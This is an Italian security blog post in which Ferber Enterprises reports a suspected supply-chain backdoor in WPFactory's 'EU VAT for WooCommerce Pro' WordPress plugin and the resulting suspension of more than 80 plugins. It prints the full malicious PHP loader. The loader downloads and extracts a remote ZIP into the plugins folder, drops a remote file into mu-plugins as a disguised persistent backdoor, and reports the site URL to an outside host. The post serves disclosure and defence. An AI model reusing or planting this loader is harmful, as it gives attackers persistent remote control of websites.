Violazione della sicurezza su WPFactory: 170.000 siti WordPress compromessi

WordPress rimane il sistema di gestione dei contenuti più utilizzato al mondo, alimentando oltre il 40 percento di tutti i siti web su Internet. Dai siti web di piccole imprese e blog personali, alle grandi piattaforme aziendali e alle infrastrutture e-commerce, il CMS è diventato la spina dorsale del web moderno. La sua popolarità deriva dalla sua flessibilità, dall'ecosistema aperto e dal vasto numero di plugin disponibili per estenderne la funzionalità.

Tuttavia, questo stesso ecosistema è diventato anche una delle maggiori sfide per la sicurezza di WordPress.

In Ferber Enterprises, il nostro team di sicurezza informatica monitora costantemente le minacce che colpiscono l'ecosistema WordPress, poiché le vulnerabilità presenti nei plugin, nei temi o nelle catene di approvvigionamento possono rapidamente degenerare in attacchi su larga scala che interessano migliaia di siti web in tutto il mondo. Negli ultimi anni, gli hacker hanno preso sempre più di mira gli sviluppatori di plugin e le infrastrutture di distribuzione piuttosto che i singoli siti web, consentendo al codice dannoso di diffondersi attraverso aggiornamenti software affidabili e canali di download ufficiali.

Questa settimana è scoppiata una forte polemica che ha coinvolto WPFactory, un noto sviluppatore di plugin per WordPress i cui prodotti sono installati su oltre 170.000 siti web in tutto il mondo. Più di 80 plugin associati all'azienda sono stati temporaneamente sospesi su WordPress.org dopo che il nostro team di sicurezza informatica di Ferber Enterprises ha individuato una sospetta backdoor all'interno della versione premium di uno dei suoi plugin.

L'incidente ha sollevato serie preoccupazioni all'interno della community di WordPress riguardo alla sicurezza della catena di approvvigionamento del software, ai processi di revisione dei plugin e alla crescente sofisticazione degli attacchi che prendono di mira l'ecosistema open-source.

La scoperta del comportamento sospetto del plugin

Il problema è emerso per la prima volta quando il nostro team di sicurezza informatica di Ferber Enterprises ha riscontrato un comportamento anomalo durante il test della versione premium del plugin "EU VAT for WooCommerce Pro", distribuito direttamente dal sito web ufficiale.

Inizialmente, l'indagine è iniziata dopo che il plugin ha generato un errore fatale durante l'installazione. Durante la risoluzione del problema, i nostri analisti hanno identificato un file PHP sospetto chiamato class-alg-wc-eu-vat-customer.php. Il file sembrava eseguire comportamenti del tutto incongruenti con la funzionalità prevista di un plugin WooCommerce per l'IVA.

<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Secondo la nostra analisi, il codice ha tentato di:

• Scarica un archivio ZIP esterno da un server remoto
• Modificare le directory principali di WordPress
• Comunicare con infrastrutture esterne
• Potenzialmente eseguire payload remoti su siti web interessati

Questi indicatori hanno immediatamente suggerito la possibile presenza di una backdoor nascosta o di una compromissione dannosa della supply chain.

Ciò che rendeva la situazione particolarmente allarmante era il fatto che il plugin non fosse stato scaricato da un mirror non ufficiale o da un repository pirata. Il pacchetto era stato scaricato direttamente dal portale clienti ufficiale di WPFactory, rafforzando il timore che lo stesso canale di distribuzione potesse essere stato compromesso.

Noi di Ferber Enterprises abbiamo immediatamente documentato l'incidente e avviato una procedura di divulgazione responsabile contattando direttamente WPFactory tramite GitHub.

WPFactory ha inizialmente risposto affermando che il file sospetto e il comportamento descritti nella segnalazione non facevano parte del proprio codice sorgente ufficiale.

Un rappresentante dell'azienda ha suggerito diverse spiegazioni alternative, tra cui:

• Un'installazione locale modificata
• Un ambiente di sito web compromesso
• Una versione plugin obsoleta
• Una fonte di download potenzialmente manomessa

L'azienda ha anche dichiarato di non essere stati in grado di ispezionare in modo sicuro il file ZIP fornito perché il loro browser ha segnalato l'archivio come potenzialmente non sicuro.

Il nostro team di sicurezza informatica ha successivamente chiarito che il plugin era stato scaricato direttamente dal sito web ufficiale di WPFactory e che il file sospetto era rimasto presente anche dopo aver scaricato una nuova copia della versione 4.6.1 dalla stessa fonte.

Questo dettaglio è diventato fondamentale per l'indagine. Se diversi download indipendenti effettuati dal canale di distribuzione ufficiale contenevano sistematicamente lo stesso codice sospetto, l'ipotesi di una compromissione del sito web locale diventava sempre meno plausibile. Nonostante questi risultati, WPFactory ha inizialmente dichiarato di non essere in grado di riprodurre il problema dalla propria parte e ha affermato che il file sospetto non era presente nel pacchetto ufficiale del plugin.

L'azienda ha quindi richiesto l'accesso come amministratore e tramite FTP all'ambiente interessato per poter proseguire le indagini. Noi di Ferber Enterprises abbiamo respinto tale richiesta per motivi di sicurezza informatica. Concedere un accesso privilegiato al server a un fornitore la cui infrastruttura poteva a sua volta essere stata compromessa avrebbe rappresentato un rischio inaccettabile per la sicurezza. Il nostro team ha invece continuato a fornire prove tecniche, tra cui un video dimostrativo che mostrava il comportamento sospetto del plugin subito dopo l'installazione.

Con il progredire delle indagini, sono cresciute le preoccupazioni riguardo alla potenziale portata del problema. WPFactory gestisce un ampio portafoglio di plugin che comprende oltre 65 plugin, con più di 170.000 installazioni attive complessive. Qualsiasi violazione che colpisca l'infrastruttura di distribuzione dell'azienda potrebbe quindi avere conseguenze di vasta portata su tutto l'ecosistema WordPress.

Il nostro team ha segnalato il problema direttamente a WordPress.org, nel tentativo di impedire che altri utenti installassero pacchetti potenzialmente compromessi mentre le indagini erano ancora in corso. WordPress.org ha quindi adottato la misura straordinaria di rimuovere temporaneamente più di 80 plugin WPFactory dal repository ufficiale.

Questa mossa ha immediatamente attirato l'attenzione di tutta la comunità di sicurezza di WordPress, poiché chiusure di plugin su larga scala di questo tipo sono relativamente rare e solitamente indicano gravi problemi irrisolti. A seguito dell'escalation, WPFactory ha successivamente riconosciuto che il problema sembrava fondato e si è scusata per non aver agito più rapidamente in seguito alla segnalazione iniziale. I rappresentanti dell'azienda hanno dichiarato di stare indagando attivamente sulla questione e di lavorare per trovare una soluzione. Un'ipotesi avanzata internamente da WPFactory suggeriva che un pacchetto di plugin obsoleto o memorizzato nella cache potesse essere stato involontariamente distribuito attraverso la loro infrastruttura.

Tuttavia, il nostro team di cybersecurity non è stato d'accordo con questa valutazione. Il comportamento osservato indicava fortemente un problema di sicurezza più profondo che potenzialmente coinvolgeva pipeline di build compromesse, sistemi di distribuzione o iniezione di codice non autorizzata all'interno degli archivi di plugin scaricabili.

Perché questo incidente è importante

La controversia relativa a WPFactory mette in luce una minaccia alla sicurezza informatica in crescita, nota come "attacco alla catena di fornitura del software". In passato, gli hacker si concentravano sulla compromissione diretta di singoli siti web tramite attacchi di forza bruta o vulnerabilità dei plugin. Oggi, invece, gli autori delle minacce prendono sempre più di mira i fornitori di software stessi, poiché compromettere un fornitore affidabile consente al codice dannoso di diffondersi simultaneamente su migliaia di siti web.

Questa strategia è già stata osservata in diversi incidenti di cybersecurity di alto profilo che hanno interessato ecosistemi software globali nell'ultimo decennio. Nello specifico dell'ecosistema WordPress, gli sviluppatori di plugin rappresentano bersagli appetibili perché i plugin sono intrinsecamente fidati dagli amministratori e spesso operano con permessi elevati.

Se del codice dannoso viene introdotto in un pacchetto di plugin distribuito tramite un canale ufficiale, i siti web interessati potrebbero installare inconsapevolmente del malware. Nel caso del plugin sospetto WPFactory, le potenziali conseguenze sono gravi.

In base alla nostra analisi, il comportamento identificato potrebbe teoricamente consentire agli aggressori di:

• Distribuisci malware aggiuntivo
• Inietta spam SEO
• Creare backdoor persistenti
• Esfiltrare dati sensibili
• Modificare le installazioni di WordPress da remoto
• Mantenere l'accesso non autorizzato per periodi prolungati

Il pericolo di tali attacchi risiede nella loro furtività. I moderni backdoor sono spesso progettati per rimanere dormienti per mesi prima di attivarsi, rendendo il rilevamento significativamente più difficile. All'inizio di questo mese, il WordPress Plugins Team ha riferito di aver chiuso oltre 30 plugin dopo che codice dannoso nascosto incorporato in un altro portafoglio di plugin era rimasto inattivo per circa otto mesi prima di attivarsi infine e iniettare spam SEO nei siti web.

Questa tendenza dimostra come gli aggressori stiano dando sempre più priorità alla persistenza e all'attivazione ritardata per eludere i meccanismi di rilevamento.

L'incidente WPFactory mette inoltre in luce più ampie sfide sistemiche in materia di sicurezza che interessano WordPress nel suo complesso. L'ecosistema dei plugin si è espanso notevolmente nell'ultimo decennio, con decine di migliaia di plugin disponibili sia sui marketplace ufficiali che su quelli commerciali. Sebbene questo ecosistema favorisca l'innovazione e la flessibilità, crea anche un'enorme complessità per quanto riguarda il controllo della sicurezza.

Secondo il rapporto di Patchstack intitolato “Lo stato della sicurezza di WordPress nel 2026”, quasi 461.000 vulnerabilità note non sono state corrette prima della loro divulgazione al pubblico. Questo dato riflette la crescente pressione a cui sono sottoposti sia gli sviluppatori di plugin che i ricercatori di sicurezza e i responsabili della manutenzione dei repository.

Allo stesso tempo, secondo quanto riferito, la coda ufficiale dei plugin WordPress in attesa di revisione supererebbe ormai i 4.000 plugin. Questi numeri dimostrano l'enorme sfida che comporta garantire il controllo della qualità e la verifica della sicurezza su larga scala.

Molti sviluppatori di plugin sono piccoli team con risorse limitate in materia di sicurezza. Altri gestiscono contemporaneamente decine di plugin, perseguendo al contempo strategie di crescita commerciale aggressive che prevedono acquisizioni e l'ampliamento del portafoglio. La stessa WPFactory si è recentemente espansa attraverso una serie di acquisizioni, tra cui l'acquisto di Extend-WP e dei suoi 19 plugin nel 2025, seguito dall'acquisizione di WBW e di diversi altri plugin nel corso dello stesso anno.

La rapida espansione del portafoglio può creare complessità operative che rendono più difficili la revisione del codice, la gestione dell'infrastruttura e la verifica dell'integrità del rilascio. Gli aggressori sono ben consapevoli di queste realtà. Sempre più spesso, si concentrano sullo sfruttamento di pratiche di sicurezza operative deboli all'interno dei fornitori di software, piuttosto che prendere di mira direttamente gli utenti finali.

La Crescente Importanza della Sicurezza della Catena di Approvvigionamento

Incidenti come questo rafforzano l'urgente necessità di pratiche di sicurezza più solide per la catena di approvvigionamento in tutto l'ecosistema di WordPress.

Noi di Ferber Enterprises, il nostro team di sicurezza informatica raccomanda vivamente agli sviluppatori di plugin di adottare diverse misure di protezione fondamentali, tra cui:

• Firma crittografica dei pacchetti
• Pipeline CI/CD sicure
• Autenticazione a più fattori obbligatoria
• Segmentazione dell'infrastruttura
• Monitoraggio continuo dell'integrità
• Audit di codice indipendenti
• Sistemi di build riproducibili

Gli amministratori del sito web dovrebbero anche rafforzare la propria postura di sicurezza. Anche i plugin scaricati da fonti ufficiali o attendibili non dovrebbero essere considerati intrinsecamente sicuri.

Le organizzazioni che gestiscono infrastrutture WordPress critiche dovrebbero considerare:

• Mantenere gli ambienti di staging
• Monitoraggio del traffico in uscita
• Scansione dei plugin prima della distribuzione
• Limitare l'uso dei plugin
• Applicare controlli di accesso basati sul principio del privilegio minimo
• Implementazione del monitoraggio dell'integrità dei file
• Utilizzo di firewall per applicazioni web (WAF) gestiti

Negli ambienti aziendali, la validazione della supply chain sta diventando importante quanto la tradizionale gestione delle vulnerabilità. L'assunto che i canali software ufficiali siano sempre sicuri non è più realistico nel panorama delle minacce odierno.

Reazioni della comunità e indagine in corso

La controversia si è rapidamente diffusa nella comunità WordPress dopo che sviluppatori, ricercatori sulla sicurezza e provider di infrastrutture hanno iniziato a discutere pubblicamente del problema.

Diverse figure di spicco dell'ecosistema hanno amplificato la consapevolezza della situazione, tra cui sviluppatori che hanno pubblicato elenchi di plugin temporaneamente chiusi e hanno incoraggiato gli amministratori a controllare i propri ambienti.

Nel frattempo, il nostro team di Ferber Enterprises continua ad analizzare i campioni di plugin sospetti e a monitorare eventuali ulteriori indicatori di compromissione che potrebbero interessare i siti web WordPress a livello globale.

Al momento della pubblicazione, WPFactory ha preso atto del problema e ha dichiarato di stare lavorando attivamente per risolverlo.

Tuttavia, molte domande rimangono senza risposta:

• L'infrastruttura di distribuzione ufficiale è stata compromessa?
• Per quanto tempo i pacchetti dannosi sono stati potenzialmente distribuiti?
• Sono stati interessati plugin aggiuntivi?
• Sono stati violati account clienti o sistemi di download?
• Gli aggressori hanno ottenuto un accesso persistente all'infrastruttura interna?
• Potrebbero ancora esistere ulteriori payload dormienti?

Finché queste domande non saranno completamente risolte, la cautela rimane essenziale.

Il futuro della sicurezza di WordPress

L'incidente WPFactory potrebbe finire per diventare un altro esempio emblematico delle sfide in materia di sicurezza informatica che l'ecosistema web open source si trova ad affrontare.

WordPress alimenta una porzione enorme dell'economia globale di Internet. Qualsiasi compromissione su larga scala che colpisca gli sviluppatori di plugin può quindi avere conseguenze che si estendono ben oltre i singoli siti web.

Poiché gli autori degli attacchi continuano a evolversi verso compromissioni della catena di approvvigionamento e tecniche di persistenza invisibili, la sicurezza dei plugin non può più essere considerata una questione secondaria. Noi di Ferber Enterprises riteniamo che questo evento rappresenti un monito fondamentale: la sicurezza informatica non riguarda solo la protezione dei siti web in sé, ma anche la messa in sicurezza di ogni livello della catena di distribuzione del software.

La fiducia negli ecosistemi aperti dipende dalla trasparenza, da una rapida risposta agli incidenti e da solide pratiche di sicurezza operativa. L'ecosistema di WordPress si trova ora di fronte a un momento importante.

Come sviluppatori, manutentori di repository, provider di hosting e team di sicurezza risponderanno a incidenti come questo aiuterà a determinare se WordPress potrà continuare a mantenere la fiducia dei milioni di aziende e organizzazioni che fanno affidamento su di essa ogni giorno.